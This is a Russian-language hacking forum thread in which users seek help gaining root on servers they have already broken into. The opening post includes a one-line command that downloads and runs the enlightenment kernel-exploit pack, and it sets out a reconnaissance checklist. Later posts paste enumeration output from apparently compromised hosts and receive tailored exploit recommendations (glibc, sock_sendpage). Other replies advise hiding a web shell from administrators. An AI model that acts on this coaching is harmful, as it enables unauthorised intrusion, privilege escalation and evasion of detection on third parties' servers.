Повышение прав [задай вопрос - получи ответ]

Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.
Первая часть темы тут.

Мануал новичкам: Рутанье
Сплоиты можно найти тут и тут
Связка сплоитов enlightenment запускается так:

Code:

1. wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!

ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф

Внимание!
Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX
Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!
Тоже самое касается серверов компаний Джино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф


Сообщение с вопросом должно содержать информацию из вывода следующих команд:

• uname -a
• ls -la /boot
• lls -la --full-time /lib (или /lib64)
• mount
• df -h
• cat /etc/issue
• cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
• cat /proc/version
• cat /proc/sys/vm/mmap_min_addr
• pwd
• ls -la /usr/bin/staprun
• find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Пример сообщения:

Оффтоп, флейм и тупые вопросы не приветствуются и удаляются, рецидивисты получают статус "рид-онли", однако грамотная помощь задающим вопросы поощряется.

 

FreeBSD 8.0

Есть проблема!

сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010

Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+attackvector+%28Attack+Vector%29

Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________________________________________

/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry

__________________________________________________________________________________
и не выкидывает.....

в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)

как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...

 

sh-3.2$ uname -a
Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin
ux

sh-3.2$ ls -la /boot
total 15720
drwxr-xr-x 4 root root 1024 Feb 26 2009 .
drwxr-xr-x 21 root root 4096 Feb 26 2009 ..
-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686
-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686
drwxr-xr-x 2 root root 1024 Feb 26 2009 grub
-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686
drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found
-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686

sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s
o.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s
o.2.11
lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti
ls.so.0.0.0

sh-3.2$ mount
/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext2 (rw)

sh-3.2$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p3 72G 6.1G 63G 9% /
tmpfs 1.8G 0 1.8G 0% /lib/init/rw
udev 10M 80K 10M 1% /dev
tmpfs 1.8G 0 1.8G 0% /dev/shm
/dev/cciss/c0d0p1 89M 16M 68M 19% /boot

sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#

sh-3.2$ cat /proc/version
Linux version 2.6.26-1-686 (Debian 2.6.26-13) ([email protected]) (gcc version 4.
1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

 

попробуй это :

https://rdot.org/forum/showthread.php?t=817

 

rootxcl:

Code:

1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!

 

Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.

rootxcl
Скинь результат выполнения команды cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))

Ты делал все с двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?

Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.

 

не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

 

Ну админ, поймёт что что-то не так, как минимум из-за того что у него команды в консоле тоже не будут выполнятся...как и у любого другого пользователя! Думаю ответ на вопрос о другом варианте отпал ? пока не исправят последствия твоих действий...консоль не заработает! Так что единственное что ты можешь сделать, это постараться спрятать шелл так, что бы его не нашли...т.к. если не админ, так его хостер 100% буду проверять сервак на наличии шелов.

 

Народ сможет кто помочь с этим:

пробовал: enlightenment и сплоиты 2.6.18-ветки, компилятора на сервире нет или не доступен...

 

winstrool, не рутается.

 

есть сервак:
____________________________________________________________________________
____________________________________________________________________________
uname -a
Linux 2.6.9-89.0.9.ELsmp #1 SMP Mon Aug 24 01:51:10 EDT 2009 i686
____________________________________________________________________________
ls -la /boot
total 26163
drwxr-xr-x 5 root root 3072 Aug 26 2009 .
drwxr-xr-x 23 root root 4096 Oct 2 08:46 ..
-rw-r--r-- 1 root root 750652 Jan 30 2007 System.map-2.6.9-42.0.8.EL
-rw-r--r-- 1 root root 767450 Jan 30 2007 System.map-2.6.9-42.0.8.ELsmp
-rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
-rw-r--r-- 1 root root 766260 Aug 12 2006 System.map-2.6.9-42.ELsmp
-rw-r--r-- 1 root root 760532 May 8 2008 System.map-2.6.9-67.0.15.EL
-rw-r--r-- 1 root root 780162 Jan 14 2009 System.map-2.6.9-78.0.13.EL
-rw-r--r-- 1 root root 797154 Jan 14 2009 System.map-2.6.9-78.0.13.ELsmp
-rw-r--r-- 1 root root 768504 Aug 24 2009 System.map-2.6.9-89.0.9.EL
-rw-r--r-- 1 root root 785498 Aug 24 2009 System.map-2.6.9-89.0.9.ELsmp
-rw-r--r-- 1 root root 50337 Jan 30 2007 config-2.6.9-42.0.8.EL
-rw-r--r-- 1 root root 49930 Jan 30 2007 config-2.6.9-42.0.8.ELsmp
-rw-r--r-- 1 root root 50333 Aug 12 2006 config-2.6.9-42.EL
-rw-r--r-- 1 root root 49926 Aug 12 2006 config-2.6.9-42.ELsmp
-rw-r--r-- 1 root root 50925 May 8 2008 config-2.6.9-67.0.15.EL
-rw-r--r-- 1 root root 51502 Jan 14 2009 config-2.6.9-78.0.13.EL
-rw-r--r-- 1 root root 51127 Jan 14 2009 config-2.6.9-78.0.13.ELsmp
-rw-r--r-- 1 root root 51613 Aug 24 2009 config-2.6.9-89.0.9.EL
-rw-r--r-- 1 root root 51238 Aug 24 2009 config-2.6.9-89.0.9.ELsmp
drwxr-xr-x 2 root root 1024 Aug 26 2009 extlinux
drwxr-xr-x 2 root root 1024 Aug 26 2009 grub
-rw-r--r-- 1 root root 505489 Feb 9 2007 initrd-2.6.9-42.0.8.EL.img
-rw-r--r-- 1 root root 495995 Feb 9 2007 initrd-2.6.9-42.0.8.ELsmp.img
-rw-r--r-- 1 root root 505219 Feb 9 2007 initrd-2.6.9-42.EL.img
-rw-r--r-- 1 root root 495765 Feb 9 2007 initrd-2.6.9-42.ELsmp.img
-rw-r--r-- 1 root root 528439 Jun 5 2008 initrd-2.6.9-67.0.15.EL.img
-rw-r--r-- 1 root root 721334 Mar 3 2009 initrd-2.6.9-78.0.13.EL.img
-rw-r--r-- 1 root root 710086 Mar 3 2009 initrd-2.6.9-78.0.13.ELsmp.img
-rw-r--r-- 1 root root 722546 Aug 26 2009 initrd-2.6.9-89.0.9.EL.img
-rw-r--r-- 1 root root 710930 Aug 26 2009 initrd-2.6.9-89.0.9.ELsmp.img
drwx------ 2 root root 12288 Feb 9 2007 lost+found
-rw-r--r-- 1 root root 9371 Aug 12 2006 message
-rw-r--r-- 1 root root 9371 Aug 12 2006 message.ja
-rw-r--r-- 1 root root 64329 May 8 2008 symvers-2.6.9-67.0.15.EL.gz
-rw-r--r-- 1 root root 66235 Jan 14 2009 symvers-2.6.9-78.0.13.EL.gz
-rw-r--r-- 1 root root 67032 Jan 14 2009 symvers-2.6.9-78.0.13.ELsmp.gz
-rw-r--r-- 1 root root 67596 Aug 24 2009 symvers-2.6.9-89.0.9.EL.gz
-rw-r--r-- 1 root root 68382 Aug 24 2009 symvers-2.6.9-89.0.9.ELsmp.gz
-rw-r--r-- 1 root root 1504589 Jan 30 2007 vmlinuz-2.6.9-42.0.8.EL
-rw-r--r-- 1 root root 1444726 Jan 30 2007 vmlinuz-2.6.9-42.0.8.ELsmp
-rw-r--r-- 1 root root 1504101 Aug 12 2006 vmlinuz-2.6.9-42.EL
-rw-r--r-- 1 root root 1444405 Aug 12 2006 vmlinuz-2.6.9-42.ELsmp
-rw-r--r-- 1 root root 1519376 May 8 2008 vmlinuz-2.6.9-67.0.15.EL
-rw-r--r-- 1 root root 1545561 Jan 14 2009 vmlinuz-2.6.9-78.0.13.EL
-rw-r--r-- 1 root root 1483646 Jan 14 2009 vmlinuz-2.6.9-78.0.13.ELsmp
-rw-r--r-- 1 root root 1533159 Aug 24 2009 vmlinuz-2.6.9-89.0.9.EL
-rw-r--r-- 1 root root 1472450 Aug 24 2009 vmlinuz-2.6.9-89.0.9.ELsmp
____________________________________________________________________________
$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1530808 2009-06-01 09:13:15.000000000 -0400 /lib/libc-2.3.4.so
lrwxrwxrwx 1 root root 13 2009-08-26 11:25:42.000000000 -0400 /lib/libc.so.6 -> libc-2.3.4.so
lrwxrwxrwx 1 root root 11 2008-06-05 12:40:20.000000000 -0400 /lib/libcap.so -> libcap.so.1
lrwxrwxrwx 1 root root 14 2007-02-09 18:55:46.000000000 -0500 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11776 2005-02-21 15:08:41.000000000 -0500 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 192392 2009-06-01 09:13:15.000000000 -0400 /lib/libcidn-2.3.4.so
lrwxrwxrwx 1 root root 16 2009-08-26 11:25:42.000000000 -0400 /lib/libcidn.so.1 -> libcidn-2.3.4.so
lrwxrwxrwx 1 root root 17 2009-08-26 11:25:55.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7004 2009-06-01 13:09:40.000000000 -0400 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 41956 2009-06-01 09:13:15.000000000 -0400 /lib/libcrypt-2.3.4.so
lrwxrwxrwx 1 root root 17 2009-08-26 11:25:42.000000000 -0400 /lib/libcrypt.so.1 -> libcrypt-2.3.4.so
-rwxr-xr-x 1 root root 945120 2009-01-15 09:05:29.000000000 -0500 /lib/libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root 19 2007-02-09 18:56:23.000000000 -0500 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
____________________________________________________________________________
$ mount
/dev/sda2 on / type ext3 (rw,noatime,nodiratime)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /boot type ext3 (rw)
none on /dev/shm type tmpfs (rw)
/dev/sda5 on /tmp type ext3 (rw,noexec,nosuid)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
____________________________________________________________________________
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 142G 71G 70G 51% /
/dev/sda1 99M 32M 62M 34% /boot
none 2.0G 0 2.0G 0% /dev/shm
/dev/sda5 981M 18M 914M 2% /tmp
____________________________________________________________________________
$ cat /etc/issue
CentOS release 4.8 (Final)
Kernel \r on an \m
____________________________________________________________________________
$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
*/45 * * * * root /usr/local/bin/php /usr/home/sites/aaaaaa.??????.com/xxxxxx.php
____________________________________________________________________________
$ cat /proc/version
Linux version 2.6.9-89.0.9.ELsmp ([email protected]) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-11)) #1 SMP Mon Aug 24 01:51:10 EDT 2009
____________________________________________________________________________
$ pwd
/home/??????/sites/www.??????.com/
____________________________________________________________________________
____________________________________________________________________________


Пробовал enlightenment, два из эксплоитов весят сервак: первый раз - в ребут, второй раз уснул часа на 1,5...
Glibc тоже не подходит...
много че пробовал, но чую : истина где-то рядом))

 

Windows NT HKWS01 5.2 build 3790
что можно попробовать?

 

Нужно помощ 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02
Подробности:


uname -a
Linux 2.6.32-46.1.BHsmp #1 SMP Tue Sep 6 12:18:02 MDT 2011 x86_64 x86_64 x86_64 GNU/Linux
------------------------
ls -la /boot
total 71184 drwxr-xr-x 7 root root 4096 Sep 12 18:17 . drwxr-xr-x 50 root root 4096 Oct 6 09:05 .. -rw-r--r-- 1 root root 175 Oct 26 2010 .vmlinuz-2.6.18-194.17.4.el5.centos.plus.hmac -rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac -rw-r--r-- 1 root root 1244350 Oct 26 2010 System.map-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1242340 Apr 2 2010 System.map-2.6.18-194.el5 -rw-r--r-- 1 root root 1490357 Sep 24 2010 System.map-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 1488922 Oct 22 2010 System.map-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 2157150 Nov 26 2010 System.map-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 2158628 Feb 23 2011 System.map-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 2158400 Jun 12 20:39 System.map-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 2169134 Jun 28 17:22 System.map-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 2167809 Sep 6 12:33 System.map-2.6.32-46.1.BHsmp -rw-r--r-- 1 root root 70165 Oct 26 2010 config-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 66887 Apr 2 2010 config-2.6.18-194.el5 -rw-r--r-- 1 root root 76997 Sep 24 2010 config-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 77018 Oct 22 2010 config-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 94885 Nov 26 2010 config-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 94833 Feb 23 2011 config-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 94865 Jun 12 20:39 config-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 94962 Jun 28 17:22 config-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 94986 Sep 6 12:33 config-2.6.32-46.1.BHsmp drwxr-xr-x 2 root root 4096 Apr 22 02:10 extlinux drwxr-xr-x 2 root root 4096 Sep 26 17:20 grub -rw------- 1 root root 2696144 Nov 4 2010 initrd-2.6.18-194.17.4.el5.centos.plus.img -rw------- 1 root root 2652439 Oct 13 2010 initrd-2.6.18-194.el5.img -rw------- 1 root root 2576907 Nov 4 2010 initrd-2.6.28-10.46.intel.IGB.BHsmp.img -rw------- 1 root root 2584714 Nov 5 2010 initrd-2.6.28-10.48.intel.IGB.BHsmp.img -rw------- 1 root root 3023760 Feb 4 2011 initrd-2.6.32-26.1.BHsmp.img -rw------- 1 root root 3040328 Mar 2 2011 initrd-2.6.32-29.1.BHsmp.img -rw------- 1 root root 3047216 Jun 12 20:39 initrd-2.6.32-39.1.BHsmp.img -rw------- 1 root root 3048932 Jul 1 13:05 initrd-2.6.32-42.1.BHsmp.img -rw------- 1 root root 3048934 Jul 1 11:01 initrd-2.6.32-42.1.BHsmp.img.old -rw------- 1 root root 3146429 Sep 26 17:20 initrd-2.6.32-46.1.BHsmp.img drwxr-xr-x 9 root root 4096 Jul 1 10:58 initrd29 drwxr-xr-x 9 root root 4096 Jul 1 11:25 initrd39 drwxr-xr-x 9 root root 4096 Jul 1 11:12 initrd42 -rw-r--r-- 1 root root 80032 Mar 16 2009 message -rw-r--r-- 1 root root 120758 Oct 26 2010 symvers-2.6.18-194.17.4.el5.centos.plus.gz -rw-r--r-- 1 root root 112656 Apr 2 2010 symvers-2.6.18-194.el5.gz -rw-r--r-- 1 root root 1955356 Oct 26 2010 vmlinuz-2.6.18-194.17.4.el5.centos.plus -rw-r--r-- 1 root root 1953660 Apr 2 2010 vmlinuz-2.6.18-194.el5 -rw-r--r-- 1 root root 2417776 Sep 24 2010 vmlinuz-2.6.28-10.46.intel.IGB.BHsmp -rw-r--r-- 1 root root 2413040 Oct 22 2010 vmlinuz-2.6.28-10.48.intel.IGB.BHsmp -rw-r--r-- 1 root root 3522368 Nov 26 2010 vmlinuz-2.6.32-26.1.BHsmp -rw-r--r-- 1 root root 3522880 Feb 23 2011 vmlinuz-2.6.32-29.1.BHsmp -rw-r--r-- 1 root root 3522592 Jun 12 20:39 vmlinuz-2.6.32-39.1.BHsmp -rw-r--r-- 1 root root 3532672 Jun 28 17:22 vmlinuz-2.6.32-42.1.BHsmp -rw-r--r-- 1 root root 3531104 Sep 6 12:33 vmlinuz-2.6.32-46.1.BHsmp
------------------------------------
ls -la --full-time /lib/libc*
-rwxr-xr-x 2 root root 1693812 2011-08-12 11:48:50.000000000 -0600 /lib/libc-2.5.so lrwxrwxrwx 2 root root 11 2011-09-14 01:50:04.000000000 -0600 /lib/libc.so.6 -> libc-2.5.so lrwxrwxrwx 2 root root 11 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so -> libcap.so.1 lrwxrwxrwx 2 root root 14 2011-06-12 19:34:21.000000000 -0600 /lib/libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 2 root root 11560 2007-03-14 12:15:10.000000000 -0600 /lib/libcap.so.1.10 -rwxr-xr-x 2 root root 191708 2011-08-12 11:48:50.000000000 -0600 /lib/libcidn-2.5.so lrwxrwxrwx 2 root root 14 2011-09-14 01:50:04.000000000 -0600 /lib/libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 2 root root 17 2011-09-14 01:50:05.000000000 -0600 /lib/libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 2 root root 7812 2011-07-21 23:04:15.000000000 -0600 /lib/libcom_err.so.2.1 -rwxr-xr-x 2 root root 45432 2011-08-12 11:48:50.000000000 -0600 /lib/libcrypt-2.5.so lrwxrwxrwx 2 root root 15 2011-09-14 01:50:04.000000000 -0600 /lib/libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 2 root root 1156324 2010-03-25 06:12:53.000000000 -0600 /lib/libcrypto.so.0.9.7a -rwxr-xr-x 2 root root 1297124 2011-08-13 19:43:56.000000000 -0600 /lib/libcrypto.so.0.9.8e lrwxrwxrwx 2 root root 19 2011-06-12 19:34:21.000000000 -0600 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a lrwxrwxrwx 2 root root 19 2011-09-14 01:50:06.000000000 -0600 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
---------------------------------
mount

/dev/sda1 on / type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) /dev/sdd1 on /home1 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdc1 on /home2 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdf1 on /home3 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sde1 on /home4 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdh1 on /home5 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdg1 on /home6 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdj1 on /home7 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sdi1 on /home8 type ext3 (rw,nosuid,noatime,nodiratime,data=writeback,commit=30) /dev/sda2 on /var type ext3 (rw,noatime,nodiratime,data=writeback,commit=30) /dev/sdb16 on /var/lib/mysql type ext3 (rw,noexec,nosuid,noatime,nodiratime,data=writeback,commit=30) none on /var/tmp type tmpfs (rw,noexec,nosuid,noatime,nodiratime,size=3g,size=8253160k) tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,size=8253160k) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /ramdisk on /ramdisk._ type none (rw,bind) tmpfs on /ramdisk type tmpfs (rw,size=8253160k) /dev/ram15 on /var/ramlog type ext2 (rw) cpuset on /cgroups_cpuset type cgroup (rw,cpuset) cpuctl on /cgroups_cpuctl type cgroup (rw,cpu) /dev/sdp on /backup1 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdq on /backup2 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdk on /backup3 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdl on /backup4 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdm on /backup5 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdo on /backup6 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdr on /backup7 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) /dev/sdn on /backup8 type xfs (rw,noexec,nosuid,noatime,nodiratime,nobarrier,logbufs=8) blockio on /cgroups_blockio type cgroup (rw,blockio) /ramdisk/home on /home type none (ro,nosuid,bind,noatime,nodiratime)
-----------------------------
df -h
Filesystem Size Used Avail Use% Mounted on /dev/sda1 65G 14G 48G 22% / /dev/sdd1 917G 50G 820G 6% /home1 /dev/sdc1 917G 53G 818G 7% /home2 /dev/sdf1 917G 197G 674G 23% /home3 /dev/sde1 917G 53G 818G 6% /home4 /dev/sdh1 917G 94G 777G 11% /home5 /dev/sdg1 917G 64G 806G 8% /home6 /dev/sdj1 917G 60G 811G 7% /home7 /dev/sdi1 917G 60G 811G 7% /home8 /dev/sda2 65G 15G 47G 24% /var /dev/sdb16 99G 12G 82G 13% /var/lib/mysql none 7.9G 191M 7.7G 3% /var/tmp tmpfs 7.9G 0 7.9G 0% /dev/shm tmpfs 7.9G 97M 7.8G 2% /ramdisk /dev/ram15 248M 6.8M 229M 3% /var/ramlog /dev/sdp 2.0T 66G 1.9T 4% /backup1 /dev/sdq 2.0T 55G 1.9T 3% /backup2 /dev/sdk 2.0T 201G 1.8T 11% /backup3 /dev/sdl 2.0T 56G 1.9T 3% /backup4 /dev/sdm 2.0T 99G 1.9T 6% /backup5 /dev/sdo 2.0T 67G 1.9T 4% /backup6 /dev/sdr 2.0T 63G 1.9T 4% /backup7 /dev/sdn 2.0T 65G 1.9T 4% /backup8
--------------------
cat /proc/version
Linux version 2.6.32-46.1.BHsmp (gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)) #1 SMP Tue Sep 6 12:18:02 MDT 2011

 

Sidarovich1975
Glibc через либу libc-*.so (https://rdot.org/forum/showpost.php?p=8233&postcount=1) тебе подойдет.
Только вместо каталога /tmp используй /home/??????/sites/www.??????.com/, т.к. /tmp у тебя смонтирован в другой раздел, а вот как раз /home (судя по выводу команды mount) у тебя отдельно не смонтирован. Т.е. тебе надо заменить по той ссылке что я дал выше все пути с /tmp на /home/... (до той директорию где будут права на write)
Можешь еще попробовать sock_sendpage3 (http://www.exploit-db.com/exploits/9641/), ну и enlightenment туда же. Но все же лучше сначала попробуй Glibc.


ekoglobul
Нет. Сентябрь 2011г, Глибц свежий.

 

не проходит ниччего:
Glibc я пробовал из
/var/tmp/
ну сейчас попробовал по совету
/home/??????/sites/www.??????.com/
вывод тот же (пишет, что неправильно указал атрибуты ping)

и сплоит этот тоже пробовал
пишет:
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Address family not supported by protokol
socket: Socket type not supported
socket: Address family not supported by protokol

по поводу enlightenment я писал :

больше не хочу - спалюсь...

 

www.1337day.com/exploits/17022
И будет тебе счастье

 

Sidarovich1975
1. Вместо ping, можно использовать любой суидник. Попробуй ping6

2. Ты после того, как получил ошибку о неправильных параметрах ping, проверил вывод id? Потому что в ошибке ping'a ничего удивительного нет =)

3. Попробуй другие версии sendpage:
sock_sendpage2: http://www.exploit-db.com/exploits/9598/ - вот второй к примеру.

4. А ты не помнишь какой сплоит из энглимента положил сервак? pipe?

Хм... Впервые вижу этот сплоит...

 

Помогите порутать сервак, пожалуйста.

Code:

sh-3.2$ uname -a
Linux  2.6.35.7-grsec #1 SMP Sat Nov 20 02:14:33 CST 2010 x86_6
4 x86_64 x86_64 GNU/Linux
sh-3.2$ ls -la /boot
total 29316
drwxr-xr-x  5 root root    1024 May 11 06:58 .
drwxr-xr-x 32 root root    4096 Oct  7 11:59 ..
